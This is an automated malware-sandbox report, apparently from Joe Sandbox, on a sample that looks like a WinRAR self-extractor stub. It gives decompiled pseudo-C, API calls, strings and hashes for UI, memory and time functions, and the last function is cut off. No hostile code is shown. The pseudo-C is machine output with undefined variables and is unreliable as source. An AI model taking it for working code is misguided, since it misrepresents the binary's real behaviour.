0x00bbc72f
0x00bbc72f
0x00000000
0x00bbc647
0x00bbc647
0x00bbc64e
0x00bbc65a
0x00bbc660
0x00bbc661
0x00bbc662
0x00bbc667
0x00bbc66a
0x00bbc66c
0x00bbc672
0x00bbc674
0x00bbc682
0x00bbc687
0x00bbc688
0x00bbc688
0x00bbc732
0x00bbc732
0x00bbc73a
0x00bbc73f
0x00bbc749
0x00bbc750
0x00bbc750
0x00bbc75d
0x00bbc764
0x00bbc769
0x00bbc771
0x00bbc77d
0x00bbc77d
0x00bbc78a
0x00bbc78f
0x00bbc797
0x00bbc7a1
0x00bbc7ae
0x00bbc7b5
0x00bbc7b5
0x00bbc7c1
0x00bbc7c8
0x00bbc7cd
0x00bbc7d5
0x00bbc7db
0x00bbc7dc
0x00bbc7dd
0x00bbc7df
0x00bbc7df
0x00bbc7f4
0x00bbc7f9
0x00bbc805
0x00bbc807
0x00bbc818
0x00bbc825
0x00000000
0x00bbc809
0x00bbc809
0x00bbc814
0x00bbc816
0x00bbc82a
0x00bbc82a
0x00bbc82c
0x00bbc832
0x00bbc838
0x00bbc846
0x00bbc84b
0x00bbc84c
0x00bbc854
0x00bbc859
0x00bbc860
0x00bbc866
0x00bbc868
0x00bbc86e
0x00bbc874
0x00bbc876
0x00bbc87f
0x00bbc882
0x00bbc884
0x00bbc88d
0x00bbc890
0x00bbc896
0x00bbc899
0x00bbc8a2
0x00bbc8b1
0x00bbc8b6
0x00bbc8be
0x00bbc8c1
0x00bbc8cf
0x00bbc8cf
0x00000000
0x00bbc8be
0x00000000
0x00bbc816
0x00bbc807
0x00000000
0x00bbc8d7
0x00bbc8d7
0x00bbc8da
0x00bbc8dc
0x00bbc8dc
0x00000000
0x00000000
0x00bbc308
0x00bbc308
0x00bbc310
0x00bbc316
0x00bbc319
0x00bbc33d
0x00bbc31b
0x00bbc31b
0x00bbc31e
0x00bbc331
0x00bbc320
0x00bbc320
0x00bbc322
0x00bbc327
0x00bbc327
0x00bbc31e
0x00000000
0x00000000
0x00bbc381
0x00bbc381
0x00bbc382
0x00bbc387
0x00bbc387
0x00bbc387
0x00bbc38a
0x00bbc38f
0x00bbc395
0x00bbc395
0x00bbc39b
0x00bbc3a1
0x00bbc3a1
0x00000000
0x00000000
0x00bbbd98
0x00bbbd9a
0x00bbbd9f
0x00bbbda5
0x00bbbda8
0x00000000
0x00bbbdaa
0x00bbbdaa
0x00000000
0x00bbbdaa
0x00bbbda8
0x00bbc914
0x00bbc91a
0x00bbc924
0x00bbc924
0x00bbc429
0x00bbc429
0x00bbc430
0x00000000
0x00000000
0x00bbc436
0x00bbc436
0x00bbc438
0x00bbc43f
0x00bbc447
0x00bbc448
0x00bbc44d
0x00bbc44e
0x00bbc44f
0x00bbc451
0x00bbc4a5
0x00bbc4a5
0x00bbc4ad
0x00bbc4bb
0x00bbc4cc
0x00bbc4da
0x00bbc4da
0x00bbc4e6
0x00bbc4eb
0x00bbc4ed
0x00bbc4fd
0x00bbc507
0x00bbc50c
0x00bbc50f
0x00000000
0x00bbc515
0x00bbc515
0x00bbc51a
0x00bbc51a
0x00bbc51c
0x00bbc523
0x00bbc529
0x00000000
0x00bbc529
0x00bbc50f
0x00bbc453
0x00bbc455
0x00bbc457
0x00bbc45e
0x00000000
0x00000000
0x00bbc460
0x00bbc460
0x00bbc462
0x00bbc468
0x00bbc468
0x00bbc468
0x00bbc46c
0x00000000
0x00000000
0x00bbc46e
0x00bbc46e
0x00bbc46f
0x00bbc475
0x00bbc478
0x00bbc47a
0x00bbc47d
0x00000000
0x00000000
0x00bbc47f
0x00000000
0x00bbc47f
0x00bbc481
0x00bbc48c
0x00bbc496
0x00bbc49b
0x00bbc49b
0x00bbc49d
0x00000000
0x00bbc52f
0x00bbc52f
0x00bbc532
0x00bbc538
0x00bbc53f
0x00bbc541
0x00bbc541
0x00bbc54b
0x00bbc54b
0x00000000
0x00bbc532

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 00BBC3C1
_swprintf.LIBCMT ref: 00BBC3F5

Part of subcall function 00BA3FD6: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BA3FE9

SetDlgItemTextW.USER32(?,00000066,00BE846A), ref: 00BBC415
_wcschr.LIBVCRUNTIME ref: 00BBC448
EndDialog.USER32(?,00000001), ref: 00BBC529

Strings

%s%s%u, xrefs: 00BBC3EA

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
String ID: %s%s%u
API String ID: 2892007947-1360425832
Opcode ID: ebfdc156eda584f123702fa761b010fa802525040796712408f9a5efce0b86cd
Instruction ID: 1beffbce9bbd6173046b9ec030515b23abc6f3fb83ed9e583c57dd092635e6ba
Opcode Fuzzy Hash: ebfdc156eda584f123702fa761b010fa802525040796712408f9a5efce0b86cd
Instruction Fuzzy Hash: 73415871900659AEEF25DBA0DC85EFE7BF8EB04305F0040E6F509E6191EFB09A848F60

Uniqueness

Uniqueness Score: -1.00%

Function 00BB8DB2 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 125
memoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00BB8DB2(void* __ecx, void* __edx) {
				void* _t20;
				short* _t24;
				void* _t28;
				signed int _t29;
				intOrPtr _t31;
				intOrPtr* _t38;
				void* _t44;
				void* _t60;
				intOrPtr* _t62;
				short* _t64;
				short* _t66;
				intOrPtr* _t70;
				long _t72;
				void* _t74;
				void* _t75;

				_t60 = __edx;
				_t45 = __ecx;
				_t44 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
					return _t20;
				}
				 *(_t74 + 8) =  *(_t74 + 8) & 0x00000000;
				_t62 =  *((intOrPtr*)(_t74 + 0x1c));
				 *((char*)(_t74 + 0x13)) = E00BB8C5A(_t62);
				_push(0x200 + E00BC33F3(_t62) * 2);
				_t24 = E00BC3413(_t45);
				_t66 = _t24;
				if(_t66 == 0) {
					L16:
					return _t24;
				}
				E00BC5646(_t66, L"<html>");
				E00BC6FAD(_t66, L"<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
				E00BC6FAD(_t66, L"utf-8\"></head>");
				_t75 = _t74 + 0x18;
				_t70 = _t62;
				_t28 = 0x20;
				if( *_t62 != _t28) {
					L4:
					_t29 = E00BB172A(_t79, _t70, L"<html>", 6);
					asm("sbb al, al");
					_t31 =  ~_t29 + 1;
					 *((intOrPtr*)(_t75 + 0x18)) = _t31;
					if(_t31 != 0) {
						_t62 = _t70 + 0xc;
					}
					E00BC6FAD(_t66, _t62);
					if( *((char*)(_t75 + 0x20)) == 0) {
						E00BC6FAD(_t66, L"</html>");
					}
					_t82 =  *((char*)(_t75 + 0x13));
					if( *((char*)(_t75 + 0x13)) == 0) {
						_push(_t66);
						_t66 = E00BB8FF5(_t60, _t82);
					}
					_t72 = 9 + E00BC33F3(_t66) * 6;
					_t64 = GlobalAlloc(0x40, _t72);
					if(_t64 != 0) {
						_t13 = _t64 + 3; // 0x3
						if(WideCharToMultiByte(0xfde9, 0, _t66, 0xffffffff, _t13, _t72 - 3, 0, 0) == 0) {
							 *_t64 = 0;
						} else {
							 *_t64 = 0xbbef;
							 *((char*)(_t64 + 2)) = 0xbf;
						}
					}
					L00BC340E(_t66);
					_t24 =  *0xc01178(_t64, 1, _t75 + 0x14);
					if(_t24 >= 0) {
						E00BB8C91( *((intOrPtr*)(_t44 + 0x10)));
						_t38 =  *((intOrPtr*)(_t75 + 0x10));
						 *0xbd2260(_t38,  *((intOrPtr*)(_t75 + 0x10)));
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *_t38 + 8))))();
					}
					goto L16;
				} else {
					goto L3;
				}
				do {
					L3:
					_t70 = _t70 + 2;
					_t79 =  *_t70 - _t28;
				} while ( *_t70 == _t28);
				goto L4;
			}

0x00bb8db2
0x00bb8db2
0x00bb8db6
0x00bb8dbc
0x00bb8f03
0x00bb8f03
0x00bb8dc2
0x00bb8dc9
0x00bb8dd4
0x00bb8de4
0x00bb8de5
0x00bb8dea
0x00bb8df0
0x00bb8efd
0x00000000
0x00bb8efe
0x00bb8dfd
0x00bb8e08
0x00bb8e13
0x00bb8e18
0x00bb8e1b
0x00bb8e1f
0x00bb8e23
0x00bb8e2e
0x00bb8e36
0x00bb8e3d
0x00bb8e3f
0x00bb8e41
0x00bb8e45
0x00bb8e47
0x00bb8e47
0x00bb8e4c
0x00bb8e58
0x00bb8e60
0x00bb8e66
0x00bb8e67
0x00bb8e6c
0x00bb8e6e
0x00bb8e76
0x00bb8e76
0x00bb8e82
0x00bb8e8e
0x00bb8e92
0x00bb8e9c
0x00bb8eb1
0x00bb8ebe
0x00bb8eb3
0x00bb8eb3
0x00bb8eb8
0x00bb8eb8
0x00bb8eb1
0x00bb8ec2
0x00bb8ed0
0x00bb8ed9
0x00bb8ee4
0x00bb8ee9
0x00bb8ef5
0x00bb8efb
0x00bb8efb
0x00000000
0x00000000
0x00000000
0x00000000
0x00bb8e25
0x00bb8e25
0x00bb8e25
0x00bb8e28
0x00bb8e28
0x00000000

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 00BB8E88
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00BB8EA9

Strings

<html>, xrefs: 00BB8DF7, 00BB8E30
utf-8"></head>, xrefs: 00BB8E0D
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00BB8E02
</html>, xrefs: 00BB8E5A

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AllocByteCharGlobalMultiWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 3286310052-4209811716
Opcode ID: 08a2b5938d8d4bb3f28f1b0dbaa0282ce94b60fd537509c9546248edca4c8e25
Instruction ID: 301ccd8c9c98bfe49ecb78b3c0d8975a7cc9e77deca8625d28e8ebfa93765cd5
Opcode Fuzzy Hash: 08a2b5938d8d4bb3f28f1b0dbaa0282ce94b60fd537509c9546248edca4c8e25
Instruction Fuzzy Hash: 013115325043516BD725AB20AC02FBBBBDCEF55720F04449EF901A62D2EFA4DA05C3A6

Uniqueness

Uniqueness Score: -1.00%

Function 00BB95B5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E00BB95B5(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
				struct tagRECT _v16;
				intOrPtr _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				intOrPtr _t32;
				struct HWND__* _t43;
				intOrPtr* _t51;
				void* _t58;
				WCHAR* _t65;
				struct HWND__* _t66;

				_t66 = _a8;
				_t51 = __ecx;
				 *(__ecx + 8) = _t66;
				 *((char*)(__ecx + 0x26)) = _a20;
				ShowWindow(_t66, 0);
				E00BB92A4(_t51, _a4);
				if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
					L00BC340E( *((intOrPtr*)(_t51 + 0x1c)));
				}
				if(_a12 != 0) {
					_push(_a12);
					_t32 = E00BC6F4C(_t51, _t58);
				} else {
					_t32 = 0;
				}
				 *((intOrPtr*)(_t51 + 0x1c)) = _t32;
				 *((intOrPtr*)(_t51 + 0x20)) = _a16;
				GetWindowRect(_t66,  &_v16);
				 *0xc01108(0,  *0xc01154(_t66,  &_v16, 2));
				if( *(_t51 + 4) != 0) {
					 *0xc01110( *(_t51 + 4));
				}
				_t39 = _v36;
				_t19 = _t39 + 1; // 0x1
				_t43 =  *0xc01118(0, L"RarHtmlClassName", 0, 0x40000000, _t19, _v36, _v28 - _v36 - 2, _v28 - _v36,  *0xc01154(_t66, 0,  *_t51, _t51, _t58));
				 *(_t51 + 4) = _t43;
				if( *((intOrPtr*)(_t51 + 0x10)) != 0) {
					__eflags = _t43;
					if(_t43 != 0) {
						ShowWindow(_t43, 5);
						return  *0xc0110c( *(_t51 + 4));
					}
				} else {
					if(_t66 != 0 &&  *((intOrPtr*)(_t51 + 0x20)) == 0) {
						_t75 =  *((intOrPtr*)(_t51 + 0x1c));
						if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
							_t43 = E00BB939C(_t51, _t75,  *((intOrPtr*)(_t51 + 0x1c)));
							_t65 = _t43;
							if(_t65 != 0) {
								ShowWindow(_t66, 5);
								SetWindowTextW(_t66, _t65);
								return L00BC340E(_t65);
							}
						}
					}
				}
				return _t43;
			}

0x00bb95be
0x00bb95c2
0x00bb95c8
0x00bb95cb
0x00bb95ce
0x00bb95da
0x00bb95e3
0x00bb95e8
0x00bb95ed
0x00bb95f3
0x00bb95f9
0x00bb95fd
0x00bb95f5
0x00bb95f5
0x00bb95f5
0x00bb9603
0x00bb960a
0x00bb9613
0x00bb962a
0x00bb9634
0x00bb9639
0x00bb9639
0x00bb963f
0x00bb964d
0x00bb967a
0x00bb9680
0x00bb9687
0x00bb96c1
0x00bb96c3
0x00bb96c8
0x00000000
0x00bb96d1
0x00bb9689
0x00bb968b
0x00bb9692
0x00bb9695
0x00bb969c
0x00bb96a1
0x00bb96a5
0x00bb96aa
0x00bb96b2
0x00000000
0x00bb96be
0x00bb96a5
0x00bb9695
0x00bb968b
0x00bb96dd

APIs

ShowWindow.USER32(?,00000000), ref: 00BB95CE
GetWindowRect.USER32(?,00000000), ref: 00BB9613
ShowWindow.USER32(?,00000005,00000000), ref: 00BB96AA
SetWindowTextW.USER32(?,00000000), ref: 00BB96B2
ShowWindow.USER32(00000000,00000005), ref: 00BB96C8

Strings

RarHtmlClassName, xrefs: 00BB9674

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 74772e8cf3c2572091c00bab79297dd5757231722ee9fe87e0a1cc9567b7f35d
Instruction ID: 8860abbae076a68de27914e8f4a8b729b58682f254446b7af8effc7a1e75049b
Opcode Fuzzy Hash: 74772e8cf3c2572091c00bab79297dd5757231722ee9fe87e0a1cc9567b7f35d
Instruction Fuzzy Hash: 8B31BF71404300EFDB159F649C48FAFBBE8EF08B11F058599FE5A96162DB75D840CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00BCBE84 Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00BCBE84(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00BCBE48(_t45, 7);
					E00BCBE48(_t45 + 0x1c, 7);
					E00BCBE48(_t45 + 0x38, 0xc);
					E00BCBE48(_t45 + 0x68, 0xc);
					E00BCBE48(_t45 + 0x98, 2);
					E00BC835E( *((intOrPtr*)(_t45 + 0xa0)));
					E00BC835E( *((intOrPtr*)(_t45 + 0xa4)));
					E00BC835E( *((intOrPtr*)(_t45 + 0xa8)));
					E00BCBE48(_t45 + 0xb4, 7);
					E00BCBE48(_t45 + 0xd0, 7);
					E00BCBE48(_t45 + 0xec, 0xc);
					E00BCBE48(_t45 + 0x11c, 0xc);
					E00BCBE48(_t45 + 0x14c, 2);
					E00BC835E( *((intOrPtr*)(_t45 + 0x154)));
					E00BC835E( *((intOrPtr*)(_t45 + 0x158)));
					E00BC835E( *((intOrPtr*)(_t45 + 0x15c)));
					return E00BC835E( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x00bcbe8a
0x00bcbe8f
0x00bcbe98
0x00bcbea3
0x00bcbeae
0x00bcbeb9
0x00bcbec7
0x00bcbed2
0x00bcbedd
0x00bcbee8
0x00bcbef6
0x00bcbf04
0x00bcbf15
0x00bcbf23
0x00bcbf31
0x00bcbf3c
0x00bcbf47
0x00bcbf52
0x00000000
0x00bcbf62
0x00bcbf67

APIs

Part of subcall function 00BCBE48: _free.LIBCMT ref: 00BCBE71

_free.LIBCMT ref: 00BCBED2

Part of subcall function 00BC835E: RtlFreeHeap.NTDLL(00000000,00000000,?,00BCBE76,?,00000000,?,00000000,?,00BCBE9D,?,00000007,?,?,00BCC29A,?), ref: 00BC8374
Part of subcall function 00BC835E: GetLastError.KERNEL32(?,?,00BCBE76,?,00000000,?,00000000,?,00BCBE9D,?,00000007,?,?,00BCC29A,?,?), ref: 00BC8386

_free.LIBCMT ref: 00BCBEDD
_free.LIBCMT ref: 00BCBEE8
_free.LIBCMT ref: 00BCBF3C
_free.LIBCMT ref: 00BCBF47
_free.LIBCMT ref: 00BCBF52
_free.LIBCMT ref: 00BCBF5D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 356fc02368e4ecaa91237549490116c2f84ce8f596afca7e47be9645dca2cef3
Instruction ID: ee69c34638f32381f3c4dbea8013a2ddba8fda21198cef9a6e43d18b3ec1b6a6
Opcode Fuzzy Hash: 356fc02368e4ecaa91237549490116c2f84ce8f596afca7e47be9645dca2cef3
Instruction Fuzzy Hash: 45117972940B48ABDA20BBB0CC07FCF77DDAF44B01F440C9CB39AA6092DB36B5059A50

Uniqueness

Uniqueness Score: -1.00%

Function 00BC1F1A Relevance: 10.6, APIs: 7, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E00BC1F1A(void* __ecx, void* __edx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t26;
				void* _t29;

				if( *0xbdd680 != 0xffffffff) {
					_t26 = GetLastError();
					_t11 = E00BC314B(__eflags,  *0xbdd680);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00BC3185(__eflags,  *0xbdd680, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t29 = E00BC8429(_t16, 1, 0x28);
								__eflags = _t29;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00BC3185(__eflags,  *0xbdd680, 0);
								} else {
									__eflags = E00BC3185(__eflags,  *0xbdd680, _t29);
									if(__eflags != 0) {
										_t11 = _t29;
										_t29 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E00BC835E(_t29);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t26);
					return _t11;
				} else {
					return 0;
				}
			}

0x00bc1f21
0x00bc1f34
0x00bc1f3b
0x00bc1f3e
0x00bc1f41
0x00bc1f5a
0x00bc1f5a
0x00bc1f43
0x00bc1f43
0x00bc1f45
0x00bc1f4f
0x00bc1f55
0x00bc1f56
0x00bc1f58
0x00bc1f68
0x00bc1f6c
0x00bc1f6e
0x00bc1f82
0x00bc1f82
0x00bc1f8b
0x00bc1f70
0x00bc1f7e
0x00bc1f80
0x00bc1f94
0x00bc1f96
0x00bc1f96
0x00000000
0x00000000
0x00000000
0x00bc1f80
0x00bc1f99
0x00000000
0x00000000
0x00000000
0x00bc1f58
0x00bc1f45
0x00bc1fa1
0x00bc1fab
0x00bc1f23
0x00bc1f25
0x00bc1f25

APIs

GetLastError.KERNEL32(?,?,00BC1F11,00BBF962), ref: 00BC1F28
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BC1F36
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BC1F4F
SetLastError.KERNEL32(00000000,?,00BC1F11,00BBF962), ref: 00BC1FA1

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: a7a54e1bb1ee6b454be542d0250472e52290cd0ebb2d805bc8a057edd6fc7a68
Instruction ID: adefb11211fa602cc914c142fb45cd0caefff17e30633a248021b006d0c7a739
Opcode Fuzzy Hash: a7a54e1bb1ee6b454be542d0250472e52290cd0ebb2d805bc8a057edd6fc7a68
Instruction Fuzzy Hash: E101D43230E2116EA7182B78BC95F2A67D4EF52B757210BAEF114A60E2FF218C029194

Uniqueness

Uniqueness Score: -1.00%

Function 00BBDAF0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E00BBDAF0() {
				intOrPtr _t1;
				_Unknown_base(*)()* _t3;
				void* _t5;
				_Unknown_base(*)()* _t6;
				struct HINSTANCE__* _t14;

				_t1 =  *0xbffcc8;
				if(_t1 != 1) {
					if(_t1 == 0) {
						_t14 = GetModuleHandleW(L"KERNEL32.DLL");
						if(_t14 != 0) {
							_t3 = GetProcAddress(_t14, "AcquireSRWLockExclusive");
							if(_t3 == 0) {
								goto L5;
							} else {
								 *0xbffccc = _t3;
								_t6 = GetProcAddress(_t14, "ReleaseSRWLockExclusive");
								if(_t6 == 0) {
									goto L5;
								} else {
									 *0xbffcd0 = _t6;
								}
							}
						} else {
							L5:
							_t14 = 1;
						}
						asm("lock cmpxchg [edx], ecx");
						if(0 != 0 || _t14 != 1) {
							if(0 != 1) {
								_t5 = 1;
							} else {
								goto L12;
							}
						} else {
							L12:
							_t5 = 0;
						}
						return _t5;
					} else {
						return 1;
					}
				} else {
					return 0;
				}
			}

0x00bbdaf0
0x00bbdafb
0x00bbdb03
0x00bbdb15
0x00bbdb19
0x00bbdb25
0x00bbdb2d
0x00000000
0x00bbdb2f
0x00bbdb35
0x00bbdb3a
0x00bbdb42
0x00000000
0x00bbdb44
0x00bbdb44
0x00bbdb44
0x00bbdb42
0x00bbdb1b
0x00bbdb1b
0x00bbdb1b
0x00bbdb1b
0x00bbdb52
0x00bbdb58
0x00bbdb60
0x00bbdb66
0x00000000
0x00000000
0x00000000
0x00bbdb62
0x00bbdb62
0x00bbdb62
0x00bbdb62
0x00bbdb6a
0x00bbdb05
0x00bbdb08
0x00bbdb08
0x00bbdafd
0x00bbdb00
0x00bbdb00

Strings

AcquireSRWLockExclusive, xrefs: 00BBDB1F
KERNEL32.DLL, xrefs: 00BBDB0A
ReleaseSRWLockExclusive, xrefs: 00BBDB2F

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID:
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 0-1718035505
Opcode ID: b70ec1694b85354c0d72e3cc7f605184e70b4d23ecdd7e410bdc99ab5c7e9635
Instruction ID: b74dceda99b9b2b094716f7f9fd20f032da0cd88a97116d03c133c979b5ad554
Opcode Fuzzy Hash: b70ec1694b85354c0d72e3cc7f605184e70b4d23ecdd7e410bdc99ab5c7e9635
Instruction Fuzzy Hash: A301DC227422735B4F346FA56CD16F7A3C8EA0275532200FBE901C3390FFA9C844DAA4

Uniqueness

Uniqueness Score: -1.00%

Function 00BB0C1E Relevance: 9.1, APIs: 6, Instructions: 94
timeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00BB0C1E(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				struct _SYSTEMTIME _v44;
				struct _SYSTEMTIME _v60;
				struct _SYSTEMTIME _v76;
				intOrPtr _t47;
				intOrPtr _t61;
				intOrPtr* _t66;
				long _t72;
				intOrPtr _t73;
				intOrPtr* _t76;

				_t73 = __edx;
				_t66 = _a4;
				_t76 = __ecx;
				_v44.wYear =  *_t66;
				_t3 = _t66 + 4; // 0x8b550004
				_v44.wMonth =  *_t3;
				_t5 = _t66 + 8; // 0x48ec83ec
				_v44.wDay =  *_t5;
				_t7 = _t66 + 0xc; // 0x85d8b53
				_v44.wHour =  *_t7;
				_t9 = _t66 + 0x10; // 0xf18b5756
				_v44.wMinute =  *_t9;
				_t11 = _t66 + 0x14; // 0x66038b66
